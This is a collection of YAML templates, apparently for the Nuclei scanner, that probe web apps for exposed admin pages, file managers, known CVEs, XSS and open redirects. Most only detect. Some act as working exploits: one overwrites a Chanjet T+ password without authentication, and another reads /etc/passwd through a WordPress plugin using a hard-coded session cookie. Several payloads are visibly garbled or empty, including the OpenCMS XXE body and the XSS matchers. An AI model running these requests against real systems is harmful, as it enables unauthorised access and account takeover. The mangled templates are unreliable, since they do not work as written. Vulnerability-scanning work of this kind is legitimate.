├── CVE-2023-44352.yaml
├── drupal-7-elfinder.yaml
├── apache-server-status.yaml
├── wp-registration.yaml
├── keycloak-open-redirect.yaml
├── server-status-localhost.yaml
├── CVE-2024-6387.yaml
├── travis-config.yaml
├── plumcloud-imagebrowser-file-upload.yaml
├── justboil-me-image-upload.yaml
├── chanjet-tplus-unauth-update.yaml
├── wp-setup-config.yaml
├── eticaret-turkey-cms-filemanager-exploit.yaml
├── CVE-2025-25163.yaml
├── CVE-2015-2794.yaml
├── CVE-2023-22232.yaml
├── CVE-2023-42344.yaml
├── CVE-2024-33326.yaml
├── CVE-2023-1893.yaml
├── CVE-2023-37988.yaml
├── CVE-2024-4367.yaml
├── joomla-solidres-xss.yaml
└── open_redirect.yaml
/CVE-2023-44352.yaml:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/drupal-7-elfinder.yaml:
--------------------------------------------------------------------------------
1 | id: drupal-7-elfinder
2 | info:
3 | name: Drupal 7 elfinder
4 | author: 0xr2r
5 | severity: high
6 | reference:
7 | - https://github.com/0xr2r/drupal-7-elfinder
8 |
9 | http:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/sites/all/libraries/elfinder/connectors/php/connector.php"
13 | matchers:
14 | - type: word
15 | words:
16 | - '{"cwd":'
17 | part: body
18 |
--------------------------------------------------------------------------------
/apache-server-status.yaml:
--------------------------------------------------------------------------------
1 | id: apache-server-status
2 | info:
3 | name: Apache Server Status Exposure
4 | author: pdteam
5 | severity: low
6 | reference:
7 | - https://www.exploit-db.com/ghdb/5548
8 | - https://www.invicti.com/web-vulnerability-scanner/vulnerabilities/apache-server-status-detected/
9 | - https://www.acunetix.com/vulnerabilities/web/apache-server-status-detected/
10 |
11 | http:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}/server-info"
15 | matchers:
16 | - type: word
17 | words:
18 | - "Apache Server Information"
19 | - "Server Settings"
20 | - "Configuration Files"
21 | condition: and
22 |
--------------------------------------------------------------------------------
/wp-registration.yaml:
--------------------------------------------------------------------------------
1 | id: Registration-wp
2 |
3 | info:
4 | name: wp Registration
5 | author: 0xr2r
6 | severity: critical
7 | reference: https://twitter.com/x0xr2r
8 | tags: rce,exposure
9 |
10 | requests:
11 | - method: GET
12 | path:
13 | - "{{BaseURL}}/wp-login.php?action=register"
14 | - "{{BaseURL}}/wp/wp-login.php?action=register"
15 |
16 |
17 |
18 |
19 | matchers-condition: and
20 | matchers:
21 | - type: word
22 | words:
23 | - "Registration"
24 | - "Register"
25 | - "confirmation"
26 | - "emailed"
27 | part: body
28 |
29 | - type: status
30 | status:
31 | - 200
32 |
--------------------------------------------------------------------------------
/keycloak-open-redirect.yaml:
--------------------------------------------------------------------------------
1 | id: keycloak-open-redirect
2 | info:
3 | name: Keycloak Open Redirect Vulnerability
4 | author: 0xr2r
5 | severity: low
6 |
7 | http:
8 | - method: GET
9 | path:
10 | - "{{BaseURL}}/auth/realms/master/protocol/openid-connect/auth?client_id&nonce=33e890be-c19f-463f-bd0e-7fdcd065c0fb&redirect_uri=http%3A%2F%2Finteract.sh&response_mode=fragment&response_type=code&scope=openid&state=72526a4b-d5b6-4424-90db-cc0f7c2001a7"
11 |
12 | matchers-condition: and
13 | matchers:
14 | - type: status
15 | status:
16 | - 302
17 | - type: word
18 | part: header
19 | words:
20 | - "Location: http://interact.sh"
21 |
--------------------------------------------------------------------------------
/server-status-localhost.yaml:
--------------------------------------------------------------------------------
1 | id: server-status-localhost
2 |
3 | info:
4 | name: Apache Server Status Check
5 | author: 0xr2r (https://twitter.com/x0xr2r)
6 | severity: medium
7 | description: Apache Server Status page is exposed, which may contain information about pages visited by the users, their IPs or sensitive information such as session tokens.
8 |
9 | tags:
10 | - server-info
11 | - server-status
12 | - balancer-manager
13 | - apache
14 | - information
15 |
16 | requests:
17 | - method: GET
18 | path:
19 | - "{{BaseURL}}/server-info"
20 | - "{{BaseURL}}/server-status"
21 | - "{{BaseURL}}/balancer-manager"
22 |
23 | matchers:
24 | - type: word
25 | part: response
26 | words:
27 | - "Server Version:"
28 |
29 |
30 |
--------------------------------------------------------------------------------
/CVE-2024-6387.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2024-6387
2 |
3 | info:
4 | name: Detect RegreSSHion
5 | author: 0xr2r
6 | severity: Critical
7 | description: An exploit for CVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler..
8 | classification:
9 | cve-id: CVE-2024-6387
10 | metadata:
11 | max-request: 2
12 | vendor: OpenSSH
13 | product: OpenSSH
14 | tags: cve,cve2024,regresshion,openssh,ssh
15 |
16 | tcp:
17 | - host:
18 | - '{{Hostname}}'
19 | port: 22
20 | matchers:
21 | - type: regex
22 | part: body
23 | regex:
24 | - 'OpenSSH_(8\.[5-9]p?[12]?|9\.[0-7]p?[12]?|[0-3]\.[0-9]p?[12]?|4\.[0-3]p?[12]?)'
25 |
--------------------------------------------------------------------------------
/travis-config.yaml:
--------------------------------------------------------------------------------
1 | id: travis-ci-disclosure
2 |
3 | info:
4 | name: Travis CI Disclosure
5 | author: 0xr2r
6 | severity: high
7 | description: Travis CI is a Software as a Service (SaaS) based continuous integration service used to build and test software projects. By defining a configuration file named `.travis.yml` in their source code repositories, developers can customize their applications build workflows.
8 | tags: config, secrets, leaks, cheatset, tokens, sql, tokens
9 |
10 | requests:
11 | - method: GET
12 | path:
13 | - '{{BaseURL}}/.travis.yml'
14 | - '{{BaseURL}}/travis.yml'
15 | matchers:
16 | - type: word
17 | part: body
18 | condition: or
19 | words:
20 | - 'language:'
21 | - 'DOCKER_MYSQL_TYPE'
22 | - 'MYSQL_ROOT_PASSWORD='
23 |
24 |
25 |
26 |
27 |
--------------------------------------------------------------------------------
/plumcloud-imagebrowser-file-upload.yaml:
--------------------------------------------------------------------------------
1 | id: plumcloud-imagebrowser-file-upload
2 |
3 | info:
4 | name: Plumcloud Image Browser File Upload
5 | author: 0xr2r
6 | severity: high
7 | description: |
8 | This template checks for the Plumcloud Image Browser file upload vulnerability, allowing unauthorized file uploads to the server.
9 | reference:
10 | - https://github.com/iskinucarx/eticaret
11 | tags: file-upload,vulnerability
12 |
13 | http:
14 | - method: GET
15 | path:
16 | - "{{BaseURL}}/_common_CS_v6/aspx/ckeditor/ImageBrowser.aspx"
17 |
18 | matchers-condition: and
19 | matchers:
20 | - type: status
21 | status:
22 | - 200
23 |
24 | - type: word
25 | part: body
26 | words:
27 | - "©2014 PlumCloud. All Rights Reserved."
28 | - "ImageBrowser.aspx"
29 |
30 | - type: regex
31 | regex:
32 | - "/uploads/ckeditor/images/.*\\.jpg"
33 |
--------------------------------------------------------------------------------
/justboil-me-image-upload.yaml:
--------------------------------------------------------------------------------
1 | id: justboil-me-image-upload
2 |
3 | info:
4 | name: Justboil.ME Plugins Image Upload Vulnerability
5 | author: ProjectDiscoveryAI
6 | severity: medium
7 | description: |
8 | This template checks for the Justboil.ME image upload vulnerability by verifying the presence of the vulnerable dialog file.
9 | tags: justboil, image-upload, vulnerability
10 |
11 | http:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}/plugins/generic/tinymce/plugins/justboil.me/dialog-v4.htm"
15 |
16 | matchers-condition: and
17 | matchers:
18 | - type: status
19 | status:
20 | - 200
21 | - type: word
22 | words:
23 | - "JustBoil.me Images Plugin"
24 | - "TinyMCE"
25 | - type: word
26 | part: header
27 | words:
28 | - "Content-Type: text/html"
29 |
30 | extractors:
31 | - type: regex
32 | part: body
33 | regex:
34 | - "(.*?)"
35 |
--------------------------------------------------------------------------------
/chanjet-tplus-unauth-update.yaml:
--------------------------------------------------------------------------------
1 | id: chanjet-tplus-unauth-update
2 |
3 | info:
4 | name: Chanjet Tplus Unauthorized Password Update
5 | author: 0xr2r
6 | severity: high
7 | reference:
8 | - https://cn-sec.com/archives/1377207.html
9 | - https://www.chanjet.com
10 | metadata:
11 | verified: true
12 | tags: tplus,unauth,chanjet,intrusive
13 |
14 | variables:
15 | password: '{{randstr}}'
16 | hash: '{{md5("{{password}}")}}'
17 |
18 | http:
19 | - method: GET
20 | path:
21 | - "{{BaseURL}}/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd"
22 |
23 | body: |
24 | {"pwdNew":"{{hash}}"}
25 |
26 | matchers-condition: and
27 | matchers:
28 | - type: word
29 | part: body
30 | words:
31 | - '{"value":true}'
32 |
33 | - type: word
34 | part: header
35 | words:
36 | - "text/plain"
37 |
38 | - type: status
39 | status:
40 | - 200
41 |
42 | extractors:
43 | - type: dsl
44 | dsl:
45 | - '"Password: " + password'
46 |
--------------------------------------------------------------------------------
/wp-setup-config.yaml:
--------------------------------------------------------------------------------
1 | id: setup-wp
2 |
3 | info:
4 | name: wp setup
5 | author: 0xr2r
6 | severity: critical
7 | reference: https://twitter.com/x0xr2r
8 | tags: rce,exposure
9 |
10 | requests:
11 | - method: GET
12 | path:
13 | - "{{BaseURL}}/wordpress/wp-admin/setup-config.php?step=1"
14 | - "{{BaseURL}}/wp/wp-admin/setup-config.php?step=1"
15 | - "{{BaseURL}}/old/wp-admin/setup-config.php?step=1"
16 | - "{{BaseURL}}/web/wp-admin/setup-config.php?step=1"
17 | - "{{BaseURL}}/new/wp-admin/setup-config.php?step=1"
18 | - "{{BaseURL}}/test/wp-admin/setup-config.php?step=1"
19 | - "{{BaseURL}}/blog/wp-admin/setup-config.php?step=1"
20 | - "{{BaseURL}}/cms/wp-admin/setup-config.php?step=1"
21 | - "{{BaseURL}}/backup/wp-admin/setup-config.php?step=1"
22 | - "{{BaseURL}}/site/wp-admin/setup-config.php?step=1"
23 | - "{{BaseURL}}/wp-admin/setup-config.php?step=1"
24 |
25 |
26 |
27 | matchers-condition: and
28 | matchers:
29 | - type: word
30 | words:
31 | - "Database Name"
32 | part: body
33 |
34 | - type: status
35 | status:
36 | - 200
37 |
--------------------------------------------------------------------------------
/eticaret-turkey-cms-filemanager-exploit.yaml:
--------------------------------------------------------------------------------
1 | id: eticaret-turkey-cms-filemanager-exploit
2 |
3 | info:
4 | name: Eticaret Turkey CMS File Manager Exploit
5 | author: 0xr2r
6 | severity: critical
7 | description: |
8 | This template detects potential vulnerabilities in the Eticaret Turkey CMS through exploitable file manager endpoints like Kcfinder and Roxy Filemanager.
9 | tags: filemanager,eticaret,exploit
10 | reference:
11 | - https://github.com/iskinucarx/eticaret
12 |
13 | http:
14 | - raw:
15 | - |
16 | GET /nedmin/production/ckeditor/kcfinder/upload.php HTTP/1.1
17 | Host: {{Hostname}}
18 |
19 | matchers-condition: and
20 | matchers:
21 | - type: status
22 | status:
23 | - 200
24 | - type: word
25 | words:
26 | - "kcfinder"
27 | - "upload"
28 | part: body
29 |
30 | - raw:
31 | - |
32 | GET /nedmin/production/fileman/index.html HTTP/1.1
33 | Host: {{Hostname}}
34 |
35 | matchers-condition: and
36 | matchers:
37 | - type: status
38 | status:
39 | - 200
40 | - type: word
41 | words:
42 | - "Roxy Filemanager"
43 | - "index.html"
44 | part: body
45 |
--------------------------------------------------------------------------------
/CVE-2025-25163.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2025-25163
2 |
3 | info:
4 | name: Plugin A/B Image Optimizer Arbitrary File Download
5 | author: 0xr2r
6 | severity: high
7 | description: |
8 | The Plugin A/B Image Optimizer plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.
9 | tags: wordpress, plugin, file-download, directory-traversal
10 | reference:
11 | - https://nvd.nist.gov/vuln/detail/CVE-2025-25163
12 | - https://www.cvedetails.com/cve/CVE-2025-25163/
13 |
14 | http:
15 | - raw:
16 | - |
17 | POST /wp-admin/admin-ajax.php HTTP/1.1
18 | Host: {{Hostname}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:135.0) Gecko/20100101 Firefox/135.0
20 | Content-Type: application/x-www-form-urlencoded
21 | Cookie: wordpress_logged_in=superadmin%7C1740046038%7C1N8xr9D0vHFOPOWEa8SZgQgnMrADwNBlBuy2clxo5pS%7C1e77f848b7d3c4d32746de6c747e981273be0adb56efe08902946257e29284fe
22 | Content-Length: 56
23 |
24 | action=ab_save_image_locally&imageUrl=file:///etc/passwd
25 | matchers-condition: and
26 | matchers:
27 | - type: status
28 | status:
29 | - 200
30 | - type: word
31 | words:
32 | - "wp-content/uploads"
33 | - type: regex
34 | regex:
35 | - "\\\\/wp-content\\\\/uploads\\\\/.*\\\\.gif"
36 |
--------------------------------------------------------------------------------
/CVE-2015-2794.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2015-2794
2 |
3 | info:
4 | name: DotNetNuke 07.04.00 - Administration Authentication Bypass
5 | author: 0xr2r
6 | severity: critical
7 | description: |
8 | The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx.
9 | reference:
10 | - https://nvd.nist.gov/vuln/detail/CVE-2015-2794
11 | - https://www.exploit-db.com/exploits/39777
12 | - http://www.dnnsoftware.com/community-blog/cid/155198/workaround-for-potential-security-issue
13 | - http://www.dnnsoftware.com/community/security/security-center
14 | - https://dotnetnuke.codeplex.com/releases/view/615317
15 | classification:
16 | cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
17 | cvss-score: 9.8
18 | cve-id: CVE-2015-2794
19 | cwe-id: CWE-264
20 | epss-score: 0.97458
21 | epss-percentile: 0.99953
22 | cpe: cpe:2.3:a:dotnetnuke:dotnetnuke:*:*:*:*:*:*:*:*
23 | metadata:
24 | verified: true
25 | max-request: 1
26 | vendor: dotnetnuke
27 | product: dotnetnuke
28 | fofo-query: app="DotNetNuke"
29 | tags: cve2015,cve,dotnetnuke,auth-bypass,install
30 |
31 | http:
32 | - method: GET
33 | path:
34 | - "{{BaseURL}}/Install/InstallWizard.aspx?__VIEWSTATE"
35 |
36 | matchers-condition: and
37 | matchers:
38 | - type: word
39 | part: body
40 | words:
41 | - "Administrative Information"
42 | - "Database Information"
43 | condition: and
44 |
45 | - type: status
46 | status:
47 | - 200
48 | # digest: 4a0a004730450221008832d97a34293638b4c086c5a28aff802fdb47075161daec024897821ed9922b02202ce97274853804157a6224c3711bc0fb0fa9f58c60aef8297fc5f8747126c182:922c64590222798bb761d5b6d8e72950
49 |
--------------------------------------------------------------------------------
/CVE-2023-22232.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2023-22232
2 |
3 | info:
4 | name: Adobe Connect < 12.1.5 - Local File Disclosure
5 | author: 0xr2r
6 | severity: medium
7 | description: |
8 | Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature. Exploitation of this issue does not require user interaction
9 | reference:
10 | - https://helpx.adobe.com/security/products/connect/apsb23-05.html
11 | - https://nvd.nist.gov/vuln/detail/CVE-2023-22232
12 | - http://packetstormsecurity.com/files/171390/Adobe-Connect-11.4.5-12.1.5-Local-File-Disclosure.html
13 | - https://github.com/ARPSyndicate/cvemon
14 | classification:
15 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
16 | cvss-score: 5.3
17 | cve-id: CVE-2023-22232
18 | cwe-id: CWE-284,NVD-CWE-noinfo
19 | epss-score: 0.12027
20 | epss-percentile: 0.94872
21 | cpe: cpe:2.3:a:adobe:connect:*:*:*:*:*:*:*:*
22 | metadata:
23 | verified: true
24 | max-request: 1
25 | vendor: adobe
26 | product: connect
27 | shodan-query: title:"Adobe Connect"
28 | tags: packetstorm,cve2023,cve,adobe,lfd,download
29 |
30 | http:
31 | - method: GET
32 | path:
33 | - "{{BaseURL}}/system/download?download-url=/_a7/p49dm7f4qjyt/output/&name=exam.pdf"
34 |
35 | matchers-condition: and
36 | matchers:
37 | - type: word
38 | words:
39 | - "Save to My Computer"
40 | - "exam.pdf"
41 | - "Click to Download"
42 | condition: and
43 |
44 | - type: status
45 | status:
46 | - 200
47 | # digest: 4a0a00473045022011127d2098a85074a0313dff3f7eb0b5b50162d5bd543d8a21af8a1eef1cc8d4022100d71ed4fcc8f5e0998b754ecc666c14488ac7266b650ea4f65c1d15760c3dbe76:922c64590222798bb761d5b6d8e72950
48 |
--------------------------------------------------------------------------------
/CVE-2023-42344.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2023-42344
2 |
3 | info:
4 | name: OpenCMS - Unauthenticated XXE
5 | author: 0xr2r
6 | severity: high
7 | description: |
8 | users can execute code without authentication. An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.
9 | remediation: Advised to upgrade to OpenCMS 10.5.1 or later to patch the vulnerability
10 | reference:
11 | - https://blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344
12 | - https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
13 | metadata:
14 | verified: true
15 | max-request: 1
16 | fofa-query: "OpenCms-9.5.3"
17 | tags: cve,cve2023,xxe,opencms
18 |
19 | http:
20 | - method: POST
21 | path:
22 | - "{{BaseURL}}/opencms/cmisatom/cmis-online/query"
23 | - "{{BaseURL}}/cmisatom/cmis-online/query"
24 | headers:
25 | Content-Type: "application/xml;charset=UTF-8"
26 | Referer: "{{RootURL}}"
27 | body: |
28 | ]>&test;falsefalsenonecmis:none1000
29 |
30 | stop-at-first-match: true
31 | matchers-condition: and
32 | matchers:
33 | - type: regex
34 | part: body
35 | regex:
36 | - "root:.*:0:0:"
37 | - "invalidArgument"
38 | condition: and
39 |
--------------------------------------------------------------------------------
/CVE-2024-33326.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2024-33326
2 |
3 | info:
4 | name: LumisXP - Cross-site Scripting
5 | author: 0xr2r
6 | severity: medium
7 | description: |
8 | A cross-site scripting (XSS) vulnerability in the XsltResultControllerHtml.jsp component of LumisXP v15.0.x to v16.1.x allows attackers to execute arbitrary web scripts or HTML via the lumPageID parameter.
9 | impact: |
10 | Successful exploitation allows attackers to execute arbitrary JavaScript in the victim's browser, potentially leading to session hijacking, credential theft, or defacement.
11 | remediation: |
12 | Apply security patches or upgrade to a version that addresses this XSS vulnerability. Implement proper input validation and output encoding.
13 | reference:
14 | - https://gist.github.com/rodnt/51ae2897abfff1bdcedccf72edbf3d24
15 | - https://seclists.org/fulldisclosure/2024/Jul/10
16 | - https://nvd.nist.gov/vuln/detail/CVE-2024-33326
17 | classification:
18 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
19 | cvss-score: 5.4
20 | cve-id: CVE-2024-33326
21 | cwe-id: CWE-79
22 | cpe: cpe:2.3:a:lumis:lumis_experience_platform:*:*:*:*:*:*:*:*
23 | metadata:
24 | verified: true
25 | max-request: 1
26 | vendor: lumis
27 | product: lumis_experience_platform
28 | tags: cve,cve2024,xss,lumis,lumisxp
29 |
30 | http:
31 | - method: GET
32 | path:
33 | - "{{BaseURL}}/portal/XsltResultControllerHtml.jsp?xslContent=&interfaceInstanceId=&lumPageId=&xslContentFilePath="
34 | - "{{BaseURL}}/XsltResultControllerHtml.jsp?xslContent=&interfaceInstanceId=&lumPageId=&xslContentFilePath="
35 |
36 | stop-at-first-match: true
37 | matchers:
38 | - type: dsl
39 | dsl:
40 | - 'contains(body, "")'
41 | - 'contains(content_type, "text/html") && contains(set_cookie, "lum")'
42 | - 'status_code == 200'
43 | condition: and
--------------------------------------------------------------------------------
/CVE-2023-1893.yaml:
--------------------------------------------------------------------------------
1 |
2 | id: CVE-2023-1893
3 | info:
4 | name: Login Configurator <=2.1 - Reflected Cross-Site Scripting
5 | author: 0xr2r
6 | severity: medium
7 | description: |
8 | Login Configurator WordPress plugin <= 2.1 contains a reflected cross-site scripting caused by improper escaping of URL parameter before outputting it to the page, letting attackers execute scripts in the context of site administrators, exploit requires victim to visit a malicious URL.
9 | impact: |
10 | Attackers can execute arbitrary scripts in the context of site administrators, potentially leading to session hijacking or account compromise.
11 | remediation: |
12 | Update to the latest version of the plugin where the issue is fixed.
13 | tags: wordpress,xss,plugin,cve,cve2023
14 | classification:
15 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
16 | cvss-score: 6.1
17 | cve-id: CVE-2023-1893
18 | cwe-id: CWE-79
19 | epss-score: 0.00099
20 | epss-percentile: 0.28143
21 | cpe: cpe:2.3:a:login_configurator_project:login_configurator:*:*:*:*:*:wordpress:*:*
22 | metadata:
23 | verified: true
24 | max-request: 1
25 | vendor: login_configurator_project
26 | product: login_configurator
27 | reference:
28 | - https://wpscan.com/vulnerability/dbe6cf09-971f-42e9-b744-9339454168c7
29 | - http://packetstormsecurity.com/files/173723/WordPress-Login-Configurator-2.1-Cross-Site-Scripting.html
30 | http:
31 | - raw:
32 | - |
33 | GET /wp-admin/options-general.php?page=login-configurator-options&tab=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E#top HTTP/1.1
34 | Host: {{Hostname}}
35 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
36 | matchers-condition: and
37 | matchers:
38 | - type: status
39 | status:
40 | - 200
41 | - type: word
42 | part: body
43 | words:
44 | - ""
45 | - type: word
46 | part: header
47 | words:
48 | - "text/html"
49 |
--------------------------------------------------------------------------------
/CVE-2023-37988.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2023-37988
2 |
3 | info:
4 | name: Contact Form Generator <= 2.5.5 - Cross-Site Scripting
5 | author: 0xr2r
6 | severity: medium
7 | description: |
8 | The Contact Form Generator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'id' parameter in wp-admin/admin.php in versions up to, and including, 2.5.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
9 | remediation: |
10 | Update to plugin version 2.5.6 or later.
11 | reference:
12 | - https://packetstorm.news/files/id/174896
13 | - https://nvd.nist.gov/vuln/detail/CVE-2023-37988
14 | classification:
15 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
16 | cvss-score: 6.1
17 | cve-id: CVE-2023-37988
18 | cwe-id: CWE-79
19 | cpe: cpe:2.3:a:creative-solutions:contact_form_generator:*:*:*:*:*:wordpress:*:*
20 | metadata:
21 | verified: true
22 | max-request: 1
23 | vendor: creative-solutions
24 | product: contact-form-generator
25 | fofa-query: body="/wp-content/plugins/contact-form-generator"
26 | tags: cve,cve2023,wordpress,wp,wp-plugin,xss,contact-form-generator,authenticated
27 |
28 | http:
29 | - raw:
30 | - |
31 | POST /wp-login.php HTTP/1.1
32 | Host: {{Hostname}}
33 | Content-Type: application/x-www-form-urlencoded
34 |
35 | log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
36 |
37 | - |
38 | GET /wp-admin/admin.php?page=contact_form_generator&id=1%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
39 | Host: {{Hostname}}
40 |
41 | matchers-condition: and
42 | matchers:
43 | - type: word
44 | part: body_2
45 | words:
46 | - ""
47 | - "contact_form_generator"
48 | condition: and
49 |
50 | - type: word
51 | part: content_type_2
52 | words:
53 | - "text/html"
54 |
55 | - type: status
56 | status:
57 | - 200
58 |
--------------------------------------------------------------------------------
/CVE-2024-4367.yaml:
--------------------------------------------------------------------------------
1 |
2 | id: CVE-2024-4367
3 |
4 | info:
5 | name: Odoo PDF.js affected by CVE-2024-4367 allowing arbitrary JavaScript execution
6 | author: 0xr2r
7 | severity: high
8 | description: |
9 | Vulnerable PDF.js (pdfjs-dist versions lower than 4.2.67) uses eval() to process fonts when rendering PDFs. This can allow attackers to execute arbitrary JavaScript
10 | by providing a specially crafted PDF. Disabling isEvalSupported or updating to version 4.2.67 or higher mitigates this issue.
11 | impact: |
12 | Vulnerable PDF.js can allow arbitrary JavaScript execution when opening manipulated PDFs.
13 | remediation: |
14 | Update PDF.js (pdfjs-dist) to 4.2.67 or higher, or disable isEvalSupported (may affect interactive PDFs).
15 | reference:
16 | - https://lists.debian.org/debian-lts-announce/2024/05/msg00012.html
17 | - https://security.snyk.io/vuln/SNYK-JS-PDFJSDIST-6810403
18 |
19 |
20 | http:
21 | - method: GET
22 | path:
23 | - "{{BaseURL}}/web/static/lib/pdfjs/web/pdf.js"
24 | - "{{BaseURL}}/web/static/lib/pdfjs/web/pdf.worker.js"
25 | - "{{BaseURL}}/web/static/lib/pdfjs/build/pdf.js"
26 | - "{{BaseURL}}/web/static/lib/pdfjs/build/pdf.worker.js"
27 | - "{{BaseURL}}/web/static/lib/pdfjs/build/pdf.min.js"
28 | - "{{BaseURL}}/web/static/lib/pdfjs/build/pdf.worker.min.js"
29 | - "{{BaseURL}}/web/static/lib/pdfjs-dist/web/pdf.js"
30 | - "{{BaseURL}}/web/static/lib/pdfjs-dist/web/pdf.worker.js"
31 | - "{{BaseURL}}/web/static/lib/pdfjs-dist/build/pdf.js"
32 | - "{{BaseURL}}/web/static/lib/pdfjs-dist/build/pdf.worker.js"
33 | - "{{BaseURL}}/web/static/lib/pdfjs-dist/build/pdf.min.js"
34 | - "{{BaseURL}}/web/static/lib/pdfjs-dist/build/pdf.worker.min.js"
35 | - "{{BaseURL}}/web/static/lib/pdfjs/web/viewer.html"
36 | matchers-condition: or
37 | matchers:
38 | - type: regex
39 | part: body
40 | regex:
41 | - "pdfjsVersion\\s*[:=]\\s*['\"]?(0\\.[0-9]{1,2}\\.[0-9]{1,3}|[1-3]\\.[0-9]{1,2}\\.[0-9]{1,3}|4\\.[0-2]\\.(?:[0-5]?[0-9]|6[0-6]))['\"]?"
42 | - type: regex
43 | part: body
44 | regex:
45 | - "PDF\\.js v(0\\.[0-9]{1,2}\\.[0-9]{1,3}|[1-3]\\.[0-9]{1,2}\\.[0-9]{1,3}|4\\.[0-2]\\.(?:[0-5]?[0-9]|6[0-6]))"
--------------------------------------------------------------------------------
/joomla-solidres-xss.yaml:
--------------------------------------------------------------------------------
1 | id: joomla-solidres-xss
2 | info:
3 | name: Joomla Solidres Reflected XSS
4 | author: 0xr2r
5 | severity: high
6 | description: |
7 | Joomla Solidres 2.13.3 contains a reflected XSS vulnerability allowing attackers to inject malicious scripts.
8 | By sending victims crafted URLs, attackers can manipulate site content or steal sensitive data.
9 | tags: xss,joomla,solidres
10 | reference:
11 | - https://extensions.joomla.org/extension/vertical-markets/booking-a-reservations/solidres/
12 | - http://demo.solidres.com/joomla
13 |
14 | http:
15 | - method: GET
16 | path:
17 | - "{{BaseURL}}/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=0&show='>
"
18 | - "{{BaseURL}}/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&reviews='>&facilities=18"
19 | - "{{BaseURL}}/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id='>"
20 | - "{{BaseURL}}/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance='>&facilities=14"
21 | - "{{BaseURL}}/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities='>"
22 | - "{{BaseURL}}/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-25&distance=0-25&categories='>"
23 | - "{{BaseURL}}/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=d2tff&ordering=distance&direction=asc&prices='>"
24 | - "{{BaseURL}}/joomla/greenery_hub/index.php/en/hotels/reservations?location='>&task=hub.search&ordering=score&direction=desc&type_id=11"
25 | - "{{BaseURL}}/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid='>&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=14"
26 |
27 | stop-at-first-match: true
28 | matchers-condition: and
29 | matchers:
30 | - type: word
31 | part: body
32 | words:
33 | - ""
34 | - type: word
35 | part: header
36 | words:
37 | - "text/html"
38 |
--------------------------------------------------------------------------------
/open_redirect.yaml:
--------------------------------------------------------------------------------
1 | id: open_redirect
2 | info:
3 | name: Open Redirect
4 | author: 0xr2r
5 | severity: medium
6 | requests:
7 | - method: GET
8 | path:
9 | - "{{BaseURL}}/https://evil.com/"
10 | - "{{BaseURL}}//https://evil.com//"
11 | - "{{BaseURL}}/?targetOrigin=https://evil.com/"
12 | - "{{BaseURL}}/?fallback=https://evil.com/"
13 | - "{{BaseURL}}/?query=https://evil.com/"
14 | - "{{BaseURL}}/?redirection_url=https://evil.com/"
